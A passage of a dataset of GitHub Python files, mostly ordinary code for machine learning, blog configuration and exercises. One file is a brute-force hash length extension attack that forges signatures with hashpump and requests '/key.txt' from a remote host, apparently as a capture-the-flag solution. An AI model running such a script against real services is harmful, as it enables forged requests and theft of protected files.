None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\n#LINKS = (('Pelican', 'http://getpelican.com/'),\n# ('Python.org', 'http://python.org/'),\n# ('Jinja2', 'http://jinja.pocoo.org/'),\n# ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (('envelope-o', 'mailto:alessandro@tanasi.it'),\n ('linkedin', 'https://www.linkedin.com/in/alessandrotanasi'),\n ('github', 'https://github.com/jekil'),\n ('twitter', 'https://twitter.com/jekil'),\n # ('instagram', 'https://www.instagram.com/jekilcoso/'),\n ('rss', 'http://feeds.feedburner.com/jekil_is_sexy'),\n )\nTWITTER_USERNAME = 'jekil'\nGITHUB_URL = 'https://github.com/jekil'\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n\nMENUITEMS = (('Archives', '/archives.html'),\n ('Categories', '/categories.html'),\n ('Tags', '/tags.html'),)\n\nCC_LICENSE = {\n 'name': 'Creative Commons Attribution-ShareAlike',\n 'version': '4.0',\n 'slug': 'by-sa'\n}\nCC_LICENSE_IMG = False\n\nSITEMAP = {\n 'format': 'xml',\n 'priorities': {\n 'articles': 0.6,\n 'indexes': 0.6,\n 'pages': 0.5,\n },\n 'changefreqs': {\n 'articles': 'monthly',\n 'indexes': 'daily',\n 'pages': 'monthly',\n }\n}\n\n# Plugins.\nPLUGIN_PATHS = ['./pelican-plugins']\nPLUGINS = ['sitemap', 'post_stats', 'pelican_alias', 'pelican_youtube']\n","repo_name":"jekil/jekil.sexy","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"12681616012","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport requests\n\n\ndef brute_force_length_extension(signature, data, additional, start_length=1, stop_length=256):\n \"\"\"Execute a hash length extension attack without knowing the length of the unknwon data\"\"\"\n for i in range(start_length, stop_length):\n stdoutdata = subprocess.getoutput(f\"hashpump -s '{signature}' -d '{data}' -a '{additional}' -k {i}\")\n signature, data = stdoutdata.split('\\n')\n \n # URL encode the hex values\n data = data.replace('\\\\x', '%')\n\n r = requests.get(\"http://9d479e5cc471d1fe1b8f.pnt.st/getfile\", params=f'filename={data}&signature={signature}')\n if r.status_code != 401:\n print(r.text)\n\n print(f\"{i}: {r.status_code}\")\n\n\nbrute_force_length_extension(signature=\"28cf3cbd57c7cf8e5da36a9a5651ede7e7972f2d1e202b8f4be9a22a00639b03\", data=\"supersecret.rb\", additional=\"/key.txt\")\n","repo_name":"CameronLonsdale/crypto_experiments","sub_path":"brute_force_length_extension.py","file_name":"brute_force_length_extension.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"39555280795","text":"import torch as T\nimport torch.nn.functional as F\nimport numpy as np\nfrom networks.ddpg_net import Actor, Critic\nfrom utils.buffer import ReplayBuffer\nfrom utils.OUAnoise import OUActionNoise\n\nclass Agent():\n def __init__(self, env, n_inputs, n_actions, tau = 0.001, gamma = 0.99, buffer_size = int(1e6), batch_size = 64) -> None:\n self.tau = tau\n self.gamma = gamma\n self.buffer_size = buffer_size\n self.batch_size = batch_size\n self.env = env\n\n self.actor = Actor(n_inputs=n_inputs, n_actions=n_actions)\n self.actor_target = Actor(n_inputs=n_inputs, n_actions=n_actions)\n self.actor_target.load_state_dict(self.actor.state_dict())\n\n self.critic = Critic(n_inputs=n_inputs, n_actions=n_actions)\n self.critic_target = Critic(n_inputs=n_inputs, n_actions=n_actions)\n self.critic_target.load_state_dict(self.critic.state_dict())\n\n self.replay_buffer = ReplayBuffer(max_size = buffer_size, input_shape = n_inputs, n_actions = n_actions)\n \n self.noise = OUActionNoise(mu=np.zeros(n_actions))\n\n self.update_network_parameters(tau=1)\n\n def store_transition(self, state, action, next_state, reward, done):\n self.replay_buffer.store(state=state, action=action, state_=next_state, rewards=reward, done=done)\n\n def choose_action(self, state):\n self.actor.eval()\n state = T.tensor(np.array([state]))\n mu = self.actor(state).to(self.actor.device)\n mu_prime = mu + T.tensor(self.noise(), dtype = T.float).to(self.actor.device)\n\n self.actor.train()\n \n return mu_prime.cpu().detach().numpy()[0]\n\n def learn(self):\n if self.replay_buffer.mem_count < self.batch_size:\n return\n\n states, actions, rewards, states_, dones = self.replay_buffer.sample(self.batch_size)\n\n states = T.tensor(states, dtype=T.float).to(self.actor.device)\n actions = T.tensor(actions, dtype=T.float).to(self.actor.device)\n states_ = T.tensor(states_, dtype=T.float).to(self.actor.device)\n rewards = T.tensor(rewards, dtype=T.float).to(self.actor.device)\n dones = T.tensor(dones).to(self.actor.device)\n\n \n\n target_actions = self.actor_target(states_)\n next_q = self.critic_target(states_, target_actions)\n q = self.critic(states, actions)\n\n next_q[dones] = 0.0\n next_q = next_q.view(-1)\n\n target = rewards + self.gamma * next_q\n target = target.view(self.batch_size, 1)\n\n self.critic.optimizer.zero_grad()\n critic_loss = F.mse_loss(target, q)\n critic_loss.backward()\n self.critic.optimizer.step()\n\n self.actor.optimizer.zero_grad()\n actor_loss = -self.critic(states, self.actor(states))\n actor_loss = T.mean(actor_loss)\n actor_loss.backward()\n self.actor.optimizer.step()\n\n self.update_network_parameters()\n\n def update_network_parameters(self, tau=None):\n if tau is None:\n tau = self.tau\n\n actor_params = self.actor.named_parameters()\n critic_params = self.critic.named_parameters()\n actor_target_params = self.actor_target.named_parameters()\n critic_target_params = self.critic_target.named_parameters()\n\n actor_state_dict = dict(actor_params)\n critic_state_dict = dict(critic_params)\n actor_target_state_dict = dict(actor_target_params)\n critic_target_state_dict = dict(critic_target_params)\n\n for name in critic_state_dict:\n critic_state_dict[name] = tau*critic_state_dict[name].clone() + (1-tau)*critic_target_state_dict[name].clone()\n\n for name in actor_state_dict:\n actor_state_dict[name] = tau*actor_state_dict[name].clone() + (1-tau)*actor_target_state_dict[name].clone()\n\n self.actor_target.load_state_dict(actor_state_dict)\n self.critic_target.load_state_dict(critic_state_dict)\n\n def run(self, n_games):\n scores = []\n for i in range(n_games):\n score = 0\n done = False\n state = self.env.reset()\n self.noise.reset()\n\n while not done:\n action = self.choose_action(state)\n state_, reward, done, info = self.env.step(action)\n score += reward\n self.env.render()\n\n self.store_transition(state=state, action=action, next_state=state_, reward=reward, done=done)\n self.learn()\n state = state_\n\n # agent.learn()\n scores.append(score)\n avg_score = np.mean(scores[-100:])\n print('episode', i, 'score %.1f' % score, 'average score %.2f' % avg_score)\n\n self.env.close()\n \n\n\n \n\n","repo_name":"FlutteryEmbers/DeepLearning","sub_path":"Reinforcement Learning/agent/DDPG.py","file_name":"DDPG.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18032141557","text":"from imgx.io.load import load_as_ppm\nfrom imgx.io.save import save_as_ppm\nfrom imgx.io import visualization as vs\nfrom imgx.mask.masks import MedianSpatialMask, OverlapStrategy\nimport time\n\n\ndef executar(normal_image_path, noised_image_path) :\n load_normal_start = time.time()\n normal_img = load_as_ppm(normal_image_path)\n load_normal_end = time.time()\n load_noise_start = time.time()\n img_just_noise = load_as_ppm(noised_image_path)\n load_noise_end = time.time()\n smoothing_start = time.time()\n img_just_smooth = img_just_noise.apply_mask(MedianSpatialMask(size=3, overlap_strategy=OverlapStrategy.CROP,\n params={'order': 70}))\n smoothing_end = time.time()\n save_result_start = time.time()\n save_as_ppm(img_just_smooth, normal_image_path.replace('normal', 'result', 1))\n save_result_end = time.time()\n\n print(f'Normal Image load time: {load_normal_end - load_normal_start} seconds.')\n print(f'Noised Image load time: {load_noise_end - load_noise_start} seconds.')\n print(f'Smoothing time: {smoothing_end - smoothing_start} seconds.')\n print(f'Saving time: {save_result_end - save_result_start} seconds.')\n\n vs.plot_images([vs.PrintableAxe(normal_img, \"Normal Image\"),\n vs.PrintableAxe(img_just_noise, \"Noised Image\"),\n vs.PrintableAxe(img_just_smooth, \"Smoothed Image\")], markers=True)\n\n\nif __name__ == '__main__':\n print(f'first test case is starting')\n executar('../image_samples/normal/grupo_02_linhas_46_palavras_300.pbm', 'image_samples/noised/grupo_02_linhas_46_palavras_300.pbm')\n print(f'second test case is starting')\n executar('../image_samples/normal/grupo_02_linhas_48_palavras_500.pbm', 'image_samples/noised/grupo_02_linhas_48_palavras_500.pbm')\n print(f'third test case is starting')\n executar('../image_samples/normal/grupo_02_linhas_52_palavras_600.pbm', 'image_samples/noised/grupo_02_linhas_52_palavras_600.pbm')\n\n","repo_name":"eduardo-fillipe/imgx-framework","sub_path":"use_cases/ocr/first_stage/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15504165639","text":"from render_big import init_render, update_render, finalize_render\nfrom game import *\nfrom time import sleep\n\n\ngame_size = 30 # num x and y cells\ngame_rate = 10 # fps\ngame_length = 500 # number of iterations to perform\n\ndef main():\n # initialize\n game_state = init_game(game_size)\n game_state = create_blinker(2, 2, game_state)\n game_state = create_beacon(5, 5, game_state)\n game_state = create_glider(5, 20, game_state)\n\n win = init_render(game_size)\n\n # run game loop\n for i in range(game_length):\n game_state = update_game(game_state)\n update_render(win, game_state)\n sleep(1 / game_rate)\n\n # finalize\n finalize_render(win)\n\nmain()","repo_name":"WillFigtree/PythonConway","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74277359808","text":"# Crie um programa que vai ler vários números e colocar em uma lista. Depois disso, crie duas listas extras que vão contar apenas os valores pares e os valores ímpares digitados, respectivamente Ao final, mostre o conteúdo das três listas geradas.\n\n# Criando as listas: lista, pares e ímpares\nlista = []\npares = []\nímpares = []\n\n# Solicita que o usuário informe um número e adiciona ele na lista\nwhile True:\n num = int(input('Digite um valor: '))\n lista.append(num)\n resp = str(input('Quer continuar? [S/N] ')).upper()\n\n# Se o usuário responder \"N\" encerra o programa\n if resp in 'N':\n break\n\n# Colocando os elementos da \"lista\" em ordem crescente\nlista.sort()\n\n# Verificando se o número informado é par e, se for, adicionar na lista \"par\"\nfor n in lista:\n if n % 2 == 0:\n pares.append(n)\n# Se o número não for par, adicionar na lista \"ímpar\"\n else:\n ímpares.append(n)\n\nprint('.'*50)\nprint(f'\\033[1;35mOs valores digitados foram: {lista}\\033[m')\nprint(f'\\033[1;33mNúmeros pares da lista: {pares}\\033[m')\nprint(f'\\033[1;34mNúmeros ímpares da lista: {ímpares}\\033[m')\n","repo_name":"simonecrepaldi/Desafios-de-Python-Curso-em-Video","sub_path":"exercícios/ex082.py","file_name":"ex082.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19495746468","text":"import sys\nimport numpy as np\nimport pdb\n\nclass StaticFns:\n\n @staticmethod\n def termination_fn(obs, act, next_obs):\n assert len(obs.shape) == len(next_obs.shape) == len(act.shape)\n\n z = next_obs[...,0]\n done = (z < 1.0) + (z > 2.0)\n\n done = done[...,None]\n return done\n\n @staticmethod\n def cost_f(obs, act, next_obs, env):\n assert len(obs.shape) == len(next_obs.shape) == len(act.shape)\n\n z = next_obs[..., 0]\n done = (z < 1.0) + (z > 2.0)\n done = done[...,None]\n done_cost = done*1.0\n \n y_dist = next_obs[..., -1:]\n # obj_cost = y_dist/2-.75\n # obj_cost = np.clip(obj_cost, 0, 1.1)\n\n obj_cost = np.any(abs(y_dist)>3, axis=-1)[...,None]*1.0\n\n cost = np.clip(done_cost+obj_cost, 0, 1)\n return cost\n","repo_name":"anyboby/ConstrainedMBPO","sub_path":"mbpo/static/humanoidsafe.py","file_name":"humanoidsafe.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"25935469248","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 13 10:56:51 2023\n\n@author: chris\n\"\"\"\n# %% Directory\nimport os\nscript_directory = os.path.dirname(os.path.abspath(__file__))\nos.chdir(script_directory)\n\n# %% Libraries\nimport pandas as pd\nimport numpy as np\nimport random as r\nfrom sklearn.naive_bayes import CategoricalNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom sklearn.feature_extraction import DictVectorizer\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# %% Load data\nmale = pd.read_table(\"../Data/names_males.txt\", sep = \"\\t\", encoding='ISO-8859-1')\nfemale = pd.read_table(\"../Data/names_females.txt\", sep = \"\\t\", encoding='ISO-8859-1') \n\n# %% Data wrangling\n# Drop NA \nmale = male.dropna()\nfemale = female.dropna()\n\n# Upsample\nmale = pd.DataFrame({\n 'Navn': male['Navn'].repeat(male['ANTAL'])\n})\n\nfemale = pd.DataFrame({\n 'Navn': female['Navn'].repeat(female['ANTAL'])\n})\n\n# Names to lower\nmale['Navn'] = [i.lower() for i in male['Navn'].tolist()]\nfemale['Navn'] = [i.lower() for i in female['Navn'].tolist()]\n\n# Add gender labels to the data\nmale['gender'] = 'male'\nfemale['gender'] = 'female'\n\n# Combine male and female datasets\nlist_males = list(zip(male['Navn'], male['gender']))\nlist_females = list(zip(female['Navn'], female['gender']))\nlabeled_names = list_males + list_females\n\n# Shuffle\nr.seed(20)\nr.shuffle(labeled_names)\n\n# Features\nX = [name for (name, gender) in labeled_names]\ny = [gender for (name, gender) in labeled_names]\n\n# # Convert labels\nlabel_encoder_y = LabelEncoder()\ny = label_encoder_y.fit_transform(y)\nlabel_encoder_X = LabelEncoder()\nX = label_encoder_X.fit_transform(X)\n\n# # Reshape X\nX = np.array(X).reshape(-1, 1)\n\n# Split the data into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=20)\n\n# %% Classifier\n# Initialize and train the scikit-learn Naive Bayes classifier\nclassifier = CategoricalNB()\nclassifier.fit(X_train, y_train)\n\n# %%\n# Making classifier wrapper function\ndef classifier_wrapper(x):\n # Contain all pre/post processing steps*\n x = [i.lower() for i in x]\n x = label_encoder_X.transform(x)\n x = np.array(x).reshape(-1, 1)\n res = classifier.predict(x)\n res = label_encoder_y.inverse_transform(res)\n return res\n\n# %%\n# Classify some examples\n\n# Errors because of unseen:\nprint(classifier_wrapper(['Neo']))\nprint(classifier_wrapper(['Trinity']))\nprint(classifier_wrapper(['Casper']))\nprint(classifier_wrapper(['Marie']))\n\n# Name of Elon Musk' child\n# print(classifier_wrapper([\"XÆA-12\"]))\n# Error because it is unseen in traning\n\n# %% Evaluate\n# Evaluate the accuracy on the test set\ny_pred = classifier.predict(X_test)\nprint(accuracy_score(y_test, y_pred))\n\n# Confusion Matrix\nconf_matrix = confusion_matrix(y_test, y_pred)\nprint('Confusion Matrix:')\nprint(conf_matrix)\n\n# Plot Confusion Matrix\nlabels = ['female', 'male']\nsns.heatmap(conf_matrix, annot=True, fmt='d', cmap='Blues', xticklabels=labels, yticklabels=labels)\nplt.xlabel('Predicted')\nplt.ylabel('True')\nplt.title('Confusion Matrix')\nplt.show()\n\n# Normalize the confusion matrix to percentages\nconf_matrix_pct = conf_matrix.astype('float') / conf_matrix.sum(axis=1)[:, np.newaxis]\nprint('Normalized Confusion Matrix:')\nprint(conf_matrix_pct)\n\n# Plot Normalized Confusion Matrix\nlabels = ['female', 'male']\nsns.heatmap(conf_matrix_pct, annot=True, fmt='.2f', cmap='Blues', xticklabels=labels, yticklabels=labels)\nplt.xlabel('Predicted')\nplt.ylabel('True')\nplt.title('Normalized Confusion Matrix (%)')\nplt.show()\n\n# %% Test on Danish census data from the year 1787 from Link Lives\n# https://link-lives.dk/en/about-link-lives/\n# This used to not contain gender. Now it does.\ndf1787 = pd.read_csv(\"../Data/Names_gender1787.csv\")\nprint(df1787)\n\n# Take only first of first names\ndf1787['clean_names'] = df1787['first_names'].str.split().str[0]\n\n# Remove unknown names\ndf1787_clean = df1787[df1787['clean_names'].isin(male['Navn']) | df1787['clean_names'].isin(female['Navn'])]\ndf1787_removed = df1787[~(df1787['clean_names'].isin(male['Navn']) | df1787['clean_names'].isin(female['Navn']))]\n\n# Print removed/unremoved\ndef N_of(x): \n return np.sum(x['n']) \nN_all = N_of(df1787)\nN_removed = N_of(df1787_removed) \nN_kept = N_of(df1787_clean)\n\n# Print descriptive\nprint(f\"All obs: {N_all}\")\nprint(f\"Obs. kept: {N_kept}; Pct: {100*round(N_kept/N_all, 4)}%\")\nprint(f\"Obs. removed: {N_removed}; Pct: {100*round(N_removed/N_all, 4)}%\")\n\n# Transform to features\nX = label_encoder_X.transform(df1787_clean['clean_names'])\n# Reshape X\nX = np.array(X).reshape(-1, 1)\n\n# Predict \ny_pred = classifier.predict(X)\n\n# ==== Test performance ====\n# True labels 1787\ny = label_encoder_y.transform(df1787_clean['gender'])\n\n# Accuracy estimated with weights from population counts in 1787\nweights = df1787_clean['n'].tolist()\naccuracy = accuracy_score(y, y_pred, sample_weight = weights)\nprint(f\"\\nAccuracy of Naïve Bayes model on 1787 data: {100*round(accuracy, 4)}%\")\nprint(f\"Corrected for unfound names: {100*round(accuracy*N_kept/N_all, 4)}%\")\n\n# Confusion Matrix\nconf_matrix = confusion_matrix(y, y_pred, sample_weight = weights)\nprint('Confusion Matrix:')\nprint(conf_matrix)\n\n# Plot Confusion Matrix\nlabels = ['female', 'male']\nsns.heatmap(conf_matrix, annot=True, fmt='d', cmap='Blues', xticklabels=labels, yticklabels=labels)\nplt.xlabel('Predicted')\nplt.ylabel('True')\nplt.title('Confusion Matrix')\nplt.show()\n\n# Normalize the confusion matrix to percentages\nrow_sums = conf_matrix.sum(axis=1)[:, np.newaxis]\nconf_matrix_pct = conf_matrix.astype('float') / row_sums\nprint('Normalized Confusion Matrix:')\nprint(conf_matrix_pct)\n\n# Plot Normalized Confusion Matrix\nlabels = ['female', 'male']\nsns.heatmap(conf_matrix_pct, annot=True, fmt='.4f', cmap='Blues', xticklabels=labels, yticklabels=labels)\nplt.xlabel('Predicted')\nplt.ylabel('True')\nplt.title('Normalized Confusion Matrix (%)')\nplt.show()\n\n","repo_name":"christianvedels/News_and_Market_Sentiment_Analytics","sub_path":"Lecture 4 - Classification pt 2/Code/Gender_classification_all_Danish_names.py","file_name":"Gender_classification_all_Danish_names.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37423937389","text":"# programa que gera uma terceira lista a partir de duas que são lidas\nx=[]\nz=[]\nnumero = 0\n\nwhile True:\n numero = float(input(\"Digite um elemento da primeira lista (0 para sair): \"))\n if numero == 0:\n break\n x += [numero]\n\nwhile True:\n numero += float(input(\"Digite um elemento da segunda lista (0 para sair): \"))\n if numero == 0:\n break\n z += [numero]\n\nprint (f\" a soma das listas é {x + z}\")\n\n","repo_name":"Rodrigodebarros17/Livropython","sub_path":"CAP6/6-2.py","file_name":"6-2.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16346060322","text":"import numpy as np\nimport tensorflow as tf\n\n################################################################################\ndef PairwiseEuclidian(X,Y):\n return tf.reduce_sum((tf.expand_dims(X, 1) - tf.expand_dims(Y, 0))**2, 2)\n\ndef PickKNearest(distMatrix, k):\n\tdists, indices_k = tf.nn.top_k(-distMatrix, k)\n\n\t'''\n\tThis is the number of training tensors\n\tUse this to determine how long to make the responsibility tensor\n\t'''\n\ttrainingNums = tf.shape(distMatrix)[1]\n\n\t'''\n\tThis creates a tensor of shape [trainingNums], then expands it for the\n\telement wise comparison in tf.equal\n\t'''\n\tindex = tf.range(trainingNums)\n\tprint(sess.run(indices_k))\n\tindex = tf.expand_dims(index, 1)\n\t\n\n\t# This prepares the tensor for the element wise comparison\n\tindices_k = tf.expand_dims(indices_k, 1)\n\n\t'''\n\tThis creates a matrix of 0s and 1s that represent whether or not a training \n\tpoint is used, then divides it by k to obtain the correct tensor for each \n\tnew test input.\n\tThe responsibility vectors are row vectors\n\t'''\n\tresponsibilites = \\\n\t\t\ttf.reduce_sum( \\\n\t\t\t\ttf.to_float(tf.equal(index, indices_k)), 2 \\\n\t\t\t) / tf.to_float(k)\n\n\treturn responsibilites\n################################################################################\ninit = tf.global_variables_initializer()\n\nsess = tf.InteractiveSession()\nsess.run(init)\n################################################################################\n\n'''\nThe format of the input matrix is the same as the output of part 1, where X is \nthe new data and Z is the trained data.\n'''\nX = tf.constant( \\\n\t[\n\t\t[1,2],\n\t\t[3,4],\n\t\t[9,3]\n\t])\nZ = tf.constant( \\\n\t[\n\t\t[8,2],\n\t\t[3,4],\n\t\t[3,6],\n\t\t[3,3],\n\t\t[12,34],\n\t\t[0,0]\n\t])\n\nprint(sess.run(PairwiseEuclidian(X,Z)))\nprint(sess.run(PickKNearest(PairwiseEuclidian(X,Z), 3)))\n","repo_name":"michaelvu97/ECE521","sub_path":"ASST1/2_1.py","file_name":"2_1.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"43956639956","text":"from itertools import permutations\r\n\r\npermutations = list(permutations([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]))\r\n\r\ndigits = []\r\nfor i in permutations[999999]:\r\n digits.append(str(i))\r\n\r\nvalue = ''.join(digits)\r\n\r\nprint(value)","repo_name":"haticesaike/Project_Euler","sub_path":"problem0024.py","file_name":"problem0024.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24381469608","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\n'''\ntf.config.optimizer.set_jit(True)\ngpus = tf.config.experimental.list_physical_devices('GPU')\nif gpus:\n # Restrict TensorFlow to only use the first GPU\n try:\n tf.config.experimental.set_visible_devices(gpus[0], 'GPU')\n except RuntimeError as e:\n # Visible devices must be set at program startup\n print(e)\n'''\n\nfrom tensorflow.keras.optimizers import Adam\nfrom unet_config import*\nimport os\nimport datetime\nfrom Unet3D import Unet3D\nimport numpy as np\nimport random\n\ndef dice_coe(y_true,y_pred, loss_type='jaccard', smooth=1.):\n\n y_true_f = tf.reshape(y_true,[-1])\n y_pred_f = tf.reshape(y_pred,[-1])\n\n intersection = tf.reduce_sum(y_true_f * y_pred_f)\n\n if loss_type == 'jaccard':\n union = tf.reduce_sum(tf.square(y_pred_f)) + tf.reduce_sum(tf.square(y_true_f))\n\n elif loss_type == 'sorensen':\n union = tf.reduce_sum(y_pred_f) + tf.reduce_sum(y_true_f)\n\n else:\n raise ValueError(\"Unknown `loss_type`: %s\" % loss_type)\n\n return (2. * intersection + smooth) / (union + smooth)\n\ndef dice_loss(y_true,y_pred, loss_type='jaccard', smooth=1.):\n\n y_true_f = tf.cast(tf.reshape(y_true,[-1]),tf.float32)\n y_pred_f =tf.cast(tf.reshape(y_pred,[-1]),tf.float32)\n\n intersection = tf.reduce_sum(y_true_f * y_pred_f)\n\n if loss_type == 'jaccard':\n union = tf.reduce_sum(tf.square(y_pred_f)) + tf.reduce_sum(tf.square(y_true_f))\n\n elif loss_type == 'sorensen':\n union = tf.reduce_sum(y_pred_f) + tf.reduce_sum(y_true_f)\n\n else:\n raise ValueError(\"Unknown `loss_type`: %s\" % loss_type)\n\n return (1-(2. * intersection + smooth) / (union + smooth))\n\n\n@tf.function\ndef decode_SEGct(Serialized_example):\n\n features={\n 'image':tf.io.FixedLenFeature([],tf.string),\n 'mask':tf.io.FixedLenFeature([],tf.string),\n 'Height':tf.io.FixedLenFeature([],tf.int64),\n 'Weight':tf.io.FixedLenFeature([],tf.int64),\n 'Depth':tf.io.FixedLenFeature([],tf.int64),\n 'Sub_id':tf.io.FixedLenFeature([],tf.string)\n\n }\n examples=tf.io.parse_single_example(Serialized_example,features)\n ##Decode_image_float\n image_1 = tf.io.decode_raw(examples['image'], float)\n #Decode_mask_as_int32\n mask_1 = tf.io.decode_raw(examples['mask'], tf.int32)\n ##Subject id is already in bytes format\n #sub_id=examples['Sub_id']\n img_shape=[examples['Height'],examples['Weight'],examples['Depth']]\n #img_shape2=[img_shape[0],img_shape[1],img_shape[2]]\n print(img_shape)\n #Resgapping_the_data\n img=tf.reshape(image_1,img_shape)\n mask=tf.reshape(mask_1,img_shape)\n #Because CNN expect(batch,H,W,D,CHANNEL)\n img=tf.expand_dims(img, axis=-1)\n mask=tf.expand_dims(mask, axis=-1)\n ###casting_values\n img=tf.cast(img, tf.float32)\n mask=tf.cast(mask,tf.int32)\n\n return img,mask\n\n\n\ndef getting_list(path):\n a=[file for file in os.listdir(path) if file.endswith('.tfrecords')]\n all_tfrecoeds=random.sample(a, len(a))\n #all_tfrecoeds.sort(key=lambda f: int(filter(str.isdigit, f)))\n list_of_tfrecords=[]\n for i in range(len(all_tfrecoeds)):\n tf_path=path+all_tfrecoeds[i]\n list_of_tfrecords.append(tf_path)\n return list_of_tfrecords\n\n#--Traing Decoder\ndef load_training_tfrecords(record_mask_file,batch_size):\n dataset=tf.data.Dataset.list_files(record_mask_file).interleave(lambda x: tf.data.TFRecordDataset(x),cycle_length=NUMBER_OF_PARALLEL_CALL,num_parallel_calls=NUMBER_OF_PARALLEL_CALL)\n dataset=dataset.map(decode_SEGct,num_parallel_calls=NUMBER_OF_PARALLEL_CALL).repeat(TRAING_EPOCH).batch(batch_size)\n batched_dataset=dataset.prefetch(PARSHING)\n return batched_dataset\n\n#--Validation Decoder\ndef load_validation_tfrecords(record_mask_file,batch_size):\n dataset=tf.data.Dataset.list_files(record_mask_file).interleave(tf.data.TFRecordDataset,cycle_length=NUMBER_OF_PARALLEL_CALL,num_parallel_calls=NUMBER_OF_PARALLEL_CALL)\n dataset=dataset.map(decode_SEGct,num_parallel_calls=NUMBER_OF_PARALLEL_CALL).repeat(TRAING_EPOCH).batch(batch_size)\n batched_dataset=dataset.prefetch(PARSHING)\n return batched_dataset\n\n\ndef Training():\n\n #TensorBoard\n logdir = os.path.join(\"LungSEG_Log_March30_2020\", datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n tensorboard_callback = tf.keras.callbacks.TensorBoard(logdir, histogram_freq=1)\n ##csv_logger\n csv_logger = tf.keras.callbacks.CSVLogger(TRAINING_CSV)\n ##Model-checkpoings\n path=TRAINING_SAVE_MODEL_PATH\n model_path=os.path.join(path, \"LungSEGModel_{val_loss:.2f}_{epoch}.h5\")\n Model_callback= tf.keras.callbacks.ModelCheckpoint(filepath=model_path,save_best_only=False,save_weights_only=True,monitor=ModelCheckpoint_MOTITOR,verbose=1)\n\n tf_train=getting_list(TRAINING_TF_RECORDS)\n tf_val=getting_list(VALIDATION_TF_RECORDS)\n\n traing_data=load_training_tfrecords(tf_train,BATCH_SIZE)\n Val_batched_dataset=load_validation_tfrecords(tf_val,BATCH_SIZE)\n\n if (NUM_OF_GPU==1):\n\n if RESUME_TRAINING==1:\n inputs = tf.keras.Input(shape=INPUT_PATCH_SIZE, name='CT')\n Model_3D=Unet3D(inputs,num_classes=NUMBER_OF_CLASSES)\n Model_3D.load_weights(RESUME_TRAIING_MODEL)\n initial_epoch_of_training=TRAINING_INITIAL_EPOCH\n Model_3D.compile(optimizer=OPTIMIZER, loss=[dice_loss], metrics=['accuracy',dice_coe])\n Model_3D.summary()\n else:\n initial_epoch_of_training=0\n inputs = tf.keras.Input(shape=INPUT_PATCH_SIZE, name='CT')\n Model_3D=Unet3D(inputs,num_classes=NUMBER_OF_CLASSES)\n Model_3D.compile(optimizer=OPTIMIZER, loss=[dice_loss], metrics=['accuracy',dice_coe])\n Model_3D.summary()\n\n Model_3D.fit(traing_data,\n steps_per_epoch=TRAINING_STEP_PER_EPOCH,\n epochs=TRAING_EPOCH,\n initial_epoch=initial_epoch_of_training,\n validation_data=Val_batched_dataset,\n validation_steps=VALIDATION_STEP,\n callbacks=[tensorboard_callback,csv_logger,Model_callback])\n\n ###Multigpu----\n else:\n mirrored_strategy = tf.distribute.MirroredStrategy(DISTRIIBUTED_STRATEGY_GPUS)\n with mirrored_strategy.scope():\n if RESUME_TRAINING==1:\n inputs = tf.keras.Input(shape=INPUT_PATCH_SIZE, name='CT')\n Model_3D=Unet3D(inputs,num_classes=NUMBER_OF_CLASSES)\n Model_3D.load_weights(RESUME_TRAIING_MODEL)\n initial_epoch_of_training=TRAINING_INITIAL_EPOCH\n Model_3D.compile(optimizer=OPTIMIZER, loss=[dice_loss], metrics=['accuracy',dice_coe])\n Model_3D.summary()\n else:\n initial_epoch_of_training=0\n inputs = tf.keras.Input(shape=INPUT_PATCH_SIZE, name='CT')\n Model_3D=Unet3D(inputs,num_classes=NUMBER_OF_CLASSES)\n Model_3D.compile(optimizer=OPTIMIZER, loss=[dice_loss], metrics=['accuracy',dice_coe])\n Model_3D.summary()\n\n\n\n Model_3D.fit(traing_data,steps_per_epoch=TRAINING_STEP_PER_EPOCH,epochs=TRAING_EPOCH,initial_epoch=initial_epoch_of_training,validation_data=Val_batched_dataset,validation_steps=VALIDATION_STEP,\n callbacks=[tensorboard_callback,csv_logger,Model_callback])\n\nif __name__ == '__main__':\n 